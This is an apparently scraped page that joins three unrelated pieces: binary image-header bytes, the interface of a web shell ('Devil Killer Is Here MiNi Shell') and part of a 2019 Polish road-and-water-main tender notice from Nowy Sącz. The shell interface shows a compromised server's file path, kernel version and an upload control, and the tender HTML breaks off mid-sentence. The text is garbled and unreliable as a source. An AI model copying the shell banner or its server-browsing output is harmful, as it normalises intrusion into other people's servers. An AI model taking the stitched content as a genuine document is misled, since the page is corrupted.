JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20190814/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20190814/586652-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 586652-N-2019 z dnia 2019-08-14 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Miejski Zarząd Dróg</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Rozbudowa drogi łączącej ul.Długoszowskiego z ul.Jamnicką wraz z wodociągiem w Nowym Sączu</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Tak</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Podmiot</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Miejski Zarząd Dróg, 33-300 Nowy Sącz ul.Wyspiańskiego 22;tel.: (018) 442-79-67; fax: (018) 442-79-67 wew.110;adres poczty elektronicznej: sekretariat@mzd.nowysacz.pl</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Sądeckie Wodociągi Spółka z o.o.,ul. Wincentego Pola 22, 33-300 Nowy Sącz; telefon:(18) 443 86 43; faks:(18) 443 83 04;adres poczty elektronicznej:biuro@swns.pl</TD></TR></TABLE> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy">Zamówienie udzielane jest jako zamówienie wspólne w rozumieniu art. 16ust. 1 Ustawy PZP.</span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Miejski Zarząd Dróg</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">00000000000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Wyspiańskiego</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">22</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">33-300</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Nowy Sącz</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">małopolskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">18-4427967</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">mzd_ns@ns.onet.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">184 427 800</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.mzd.nowysacz.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia">1.Stosownie do art.16 ust.1 Ustawy Pzp, Zamawiający wskazują Miejski Zarząd Dróg Nowy Sączjako Zamawiającego upoważnionego do przeprowadzenia postępowania i udzielenia zamówienia wich imieniu i na ich rzecz. 2.Strony upoważniły MZD do wykonywania wszelkich czynnościniezbędnych do realizacji zamówienia publicznego, w szczególności związanych zprzygotowaniem i przeprowadzeniem postępowania o udzielenie wspólnego zamówieniazastrzeżone w postępowaniu o udzielenie zamówienia publicznego do kompetencji kierownikazamawiającego, nie wyłączając reprezentowania Stron w postępowaniu odwoławczym iskargowym przed Krajową Izbą Odwoławczą i sądami powszechnymi. 3.Strony zobowiązały się donastępującej partycypacji w kosztach realizacji Zamówienia: a)SW pokryją koszty związane zrealizacją przez wybranego do realizacji Zamówienia oferenta zadań w zakresie przełożeniaodcinka sieci wodociągowej z przepięciem przyłączy; b)MZD pokryje wszelkie inne,kosztyzwiązane z realizacją Zamówienia.</span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.mzd.nowysacz.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.mzd.nowysacz.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">pisemnie na adres siedziby Zamawiającego</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">33-300 Nowy Sącz ul.Wyspiańskiego 22</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Rozbudowa drogi łączącej ul.Długoszowskiego z ul.Jamnicką wraz z wodociągiem w Nowym Sączu</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">271.2.1.2019</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Zakres robót obejmuje: Przedmiotem inwestycji jest rozbudowa łącznika ul.Długoszowskiego z ul. Jamnicką w ramach zadania pn.,,Rozbudowa drogi łączącej ul. JanaDługoszowskiego z ul. Jamnicką wraz z wodociągiem w Nowym Sączu". Rozbudowa drogi polega nabudowie chodnika, budowie jezdni o nawierzchni betonowej, rozbudowie systemu kanalizacjizamkniętej oraz budowie wodociągu. Zakres robót dotyczy: - rozebranie ogrodzeń kolidujących zinwestycją; - przebudowy sieci kolidujących z inwestycją; - rozbudowy drogi długości 0,3km; -przebudowy skrzyżowania istniejącej drogi z ul. Długoszowskiego oraz Jamnicką; - budowyodwodnienia drogi. Zagospodarowanie terenu Projektuje się rozbudowę drogi klasy D o prędkościprojektowej Vp=30km/h i szerokości 5,50m na całym odcinku. Projektowany chodnik będzie onawierzchni z kostki brukowej gr. 6cm na podsypce cemen-towo piaskowej na podbudowie zkruszywa łamanego. Na zjazdach projektuje się kostkę o gr. 8cm oraz zaniżenie krawężnika do 2cmpowyżej poziomu jezdni. Nawierzchnię na zjazdach poza chodnikiem projektuje się z kostkibetonowej gr.8cm. Projektowana nawierzchnia jezdni będzie z warstw betonowych C30/35 ścieralnaoraz pod-budowy zasadniczej z kruszywa. Projektuje się warstwę podbudowy z mieszankiniezwiązanej z kruszywem C90/3, oraz war-stwę mrozoochronną z mieszanki niezwiązanej oCBR>35%. Projektuje się stabilizację gruntu spoiwem hydraulicznym. Deszczówka z jezdni zostaniewprowadzona do istniejącego kanału deszczowego ?1200 poprzez wpusty deszczowe kl. D400.Istniejący kanał zaczyna się po lewej stronie ul. Długo-szowskiego, a następnie biegnie wzdłużistniejącego łącznika. Wylot istniejącego kanału zlokalizowany jest po prawej stronie ul. Jamnickiej.Woda z projektowanych wpustów zostanie wprowadzona do kanału przez przykanaliki ?200 orazstudnie monolityczne, które zostaną podłączone do istniejącego kanału. Łącznie projek-tuje się 5studni monolitycznych o wymiarach 1.8x1.8m oraz jedną studnię monolityczną o wymiarach2.0x2.0m. Projektowany łącznik zostanie zakończony placem do zawracania o promieniu R-6,0m. Projektowananawierzchnia placu będzie wykonana z kostki brukowej o grubości 10cm oraz ograniczonakrawężnikiem betonowym 15x30cm zaniżonym do 2cm powyżej jezdni. Na końcu placu projektuje się zjazd publiczny o szerokości jezdni 3,5m oraz pobocza o szerokości 0,75m służący do połączeniaprojektowanej drogi z istniejącym odcinkiem o nawierzchni żwi-rowej. Stan powierzchni terenu pozakończonych pracach zostanie uporządkowany i zagospodaro-wany. Nie przewiduje się żadnejingerencji w zagospodarowanie terenu poza obszarem in-westycji. Projektowana budowa drogi niebędzie miała negatywnego wpływu na otaczające środowisko przyrodnicze i powierzchnię terenu.Parametry geometryczne przekroju poprzecznego na drodze Projektowany przekrój porzeczny drogiskłada się z następujących elementów: - jezdni o szerokości 5,5m zakończonej placem do zawracaniao promieniu R=6,0m; - prawostronny chodnik o szerokości 1,58m; - pobocze o szerokości 0,75m.Konstrukcji nawierzchni konstrukcja jezdni rozbudowywanej drogi: 22cm - w-wa ścieralna z betonucementowego C30/37 28cm - w-wa podbudowy zasadniczej z mieszanki niezwiązanej z kruszywemC90/3 22cm - w-wa mrozochronna z mieszanki niezwiązanej o CBR>35% 24cm - w-wa stabilizacjigruntu rodzimego spoiwem hydraulicznym o Rm=1,5MPa Razem:96cm konstrukcja placu dozawracania na rozbudowywanej drodze: 10cm - kostka brukowa betonowa 3cm - podsypkacementowo-piaskowa 20cm - w-wa podbudowy zasadniczej z mieszanki niezwiązanej z kruszywemC90/3 28cm - w-wa mrozochronna z mieszanki niezwiązanej o CBR>35% 25cm - w-wa stabilizacjigruntu rodzimego spoiwem hydraulicznym o Rm=1,5MP Razem:86cm konstrukcja chodnikarozbudowywanej drogi: 6cm - kostka brukowa betonowa 3cm - podsypka cementowo-piaskowa 20cm- w-wa podbudowy z kruszywa łamanego stabilizowanego mechanicznie Razem: 29 cm konstrukcjachodnika na zjazdach rozbudowywanej drogi: 8cm - kostka brukowa betonowa 3cm - podsypkacementowo-piaskowa 20cm - w-wa podbudowy z kruszywa łamanego stabilizowanego mechanicznieRazem: 31 cm konstrukcja na zjazdach poza chodnikiem: 8cm - kostka brukowa betonowa 3cm -podsypka cementowo-piaskowa 20cm - w-wa podbudowy z kruszywa łamanego stabilizowanegomechanicznie 30cm - w-wa podbudowy z kruszywa naturalnego stabilizowanego mechanicznieRazem: 61 cm Kolizje i ich rozwiązania W obrębie planowanej inwestycji występują kolizje znastępującymi sieciami uzbrojenia tere-nu: - sieć energetyczna; - sieć teletechniczna; - siećwodociągowa; - sieć kanalizacji deszczowej; - sieć kanalizacji sanitarnej. Projektowana zieleń Skarpynasypów i wykopów nieumocnionych należy obsiać trawą. Drzewa, krzewy i samo-siejki rosnącebezpośrednio w zasięgu robót związanych z realizacją przebudowy drogi przeznaczone są dousunięcia. Odwodnienie Na system odwodnienia drogi składać się będą: - studnie monolityczne owymiarach 1.8x1.8m oraz 2.0x2.0m; - wpusty deszczowe kl. D400; - istniejący kanał z rur stalowychHelcor o średnicy ?1200; - przykanaliki z rur PVC o średnicy ?200. W związku z projektowanąbudową łącznika między ul.Długoszowskiego a ulicą Jamnicką, zaprojektowano: przebudowę izabezpieczenie linii kablowej SN i nN, zgodnie z warunkami przebudowy, wy-danymi przezTAURON Dystrybucja S.A. Oddział w Krakowie. Wykonanie prac w zakresie przełożenia odcinka sieci wodociągowej z przepięciem przyłączy, w tym zwłaszcza: sieć wodociągowa Podłączenie należywykonać w miejscu istniejącego hydrantu p.poż. na rozdzielczej sieci wodociągowej PE160,zlokalizowanej w pasie drogowym ulicy Długoszowskiego na wysoko-ści budynku Nr 83. Wpięcienastąpi w punkcie A poprzez wstawienie w istniejącą sieć trójnika równoprzelotowego PE1160/160.Za włączeniem na terenie przyszłego chodnika należy za-montować zasuwę żeliwną fi150mm np. typuHawle lub równoważną, zakończoną od góry skrzynką uliczną. Wodociąg projektuje się w pasieprzyszłego chodnika rozbudowywanej drogi i należy go zakończyć zasuwą fi150mm, zakończoną odgóry skrzynką uliczną w pasie drogowym ulicy Jamnickiej. Zdemontowany węzeł hydrantowy zwłączenia w jezdni ulicy Długoszowskiego należy przełożyć w projektowany pas chodnika. Siećwodociągową projektuje się wykonać z rur i kształtek - polietylenowych z tworzywa PE100RC, klasySDR 11, PN16, o średnicy: PE160x14.6mm, spełniających wymogi normy: PN-EN 12201-1-3:2004 .Lokalizacja, średnice oraz długości projektowanych odcinków jak na załączonych mapachsytuacyjnych i profilach. Zastosowane rury i kształtki muszą być jednego systemu i pocho-dzić odjednego producenta oraz powinny posiadać atest higieniczny i certyfikat zgodności, potwierdzającyzgodność z wszystkimi wymaganiami norm. Rury należy układać w wykopie z zabezpieczonymiścianami o minimalnej szerokości równej 0.8m. Proponuje się wykopy wąskoprzestrzenne o ścianachpionowych, odeskowanych i rozpartych. Wykopy należy wykonywać zgodnie z normą PNB-10736/99. Roboty ziemne. Wykopy otwarte dla przewodów wodociągowych i kanalizacyjnych.Warunki techniczne wy-konania., PN-B-06050. Geotechnika. Roboty ziemne. Wymagania.,warunkami technicznymi oraz warunkami określonymi przez administratora dróg: MZD w NowymSączu. Rury i kształtki polietylenowe należy łączyć metodą zgrzewania doczołowego. Zmianykierunku przewodów z tworzyw sztucznych można wykonać stosując kształtki lub wykorzystując właściwośćelastyczności rur, uważając by nie przekroczyć dopuszczalnego promienia wygięcia: 50 x Dz.Przewody wodociągowe z rur polietylenowych nie wymagają stosowania bloków oporowych przyzmianie kierunku, natomiast wykonać należy bloki podporowe pod armaturę i kształtki wykonane zżeliwa, z uwagi na zróżnicowaną elastyczność i giętkość oraz różny stopień osiadania elementówżeliwnych i z PE. Wodociąg należy układać na głębokości i ze spadkiem. Na trasie projektowanegowodociągu w projektowanym chodniku drogi oraz za placem do zawracania samochodów proponujesię lokalizację węzłów hydrantowych, składa-jących się z zasuw żeliwnych fi80mm, zakończonych odgóry skrzynkami ulicznymi oraz podziemnych hydrantów p.poż. fi80mm -2 sztuk (zgodnie zRozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 24 lipca 2009 r. w sprawieprzeciwpożarowego zaopatrzenia w wodę oraz dróg pożarowych: Dz. U. z dnia 6 sierpnia 2009 r),zapewniających wymaganą ilość wody do celów p.poż. Według materiałów i instrukcji producentówrury typu PE100 RC nie wymagają stosowania podsypki i obsypki piaskowej, niemniej jednak proponuje się wykonanie 10 cm podsypki i 20 cm obsypki z materiału sypkiego. Resztę wykopunależy zasypać pospółką na pełną głębokość z zagęszczeniem warstwami co 20 cm, do uzyskanianormatywnego wskaźnika zagęszczenia z przedstawieniem w MZD badania wskaźnika zagęszczenia.Na przyłączu wodociągowym wykonanym z rur PE należy w wykopie nad rurociągiem na wysokości40-50 cm ułożyć oznakowanie folią ostrzegawczo-sygnalizacyjną o szerokości 20 cm w kolorze białoniebieskimz wtopioną taśmą metalową. Uzbrojenie na wodociągu należy oznakować tabliczkamizgodnie z PN-86/B-09700. Całość wykonać wg normy: PN-B-10725: 1997 .Przewody zewnętrzne.Wymagania i bada-nia. Po wykonaniu projektowanej sieci i przepięciu wszystkich istniejącychprzyłączy - odcinek istniejącej sieci PE90 należy zlikwidować od punktu włączenia w ul.Długoszowskiego. Przyłącza wodociągowe Część odbiorców w rozbudowywanej drodze posiada jużprzyłącza wodociągowe, zasilane z istniejącej sieci PE90, przebiegającej po działkach prywatnych podrugiej stronie drogi. Wszystkie istniejące przyłącza należy przepiąć do nowoprojektowanej sieci. Wzwiązku z powyższym projektuje się odcinki przyłączy w pasie drogowym do połączenia zistniejącymi przyłączami (pozostała ich część będzie objęta innym opracowaniem) oraz odcinkiprzyłączy, przebiegające w pasie drogowym dla ewentualnych nowych odbiorców, którzy mogą wpiąćsię do nowowybudowanej sieci. Projektowane odcinki będą włączone do sieci poprzez zamontowanieopaski do nawiercania z odejściem gwintowanym, trójnika siodłowego lub poprzez wbudowaniu 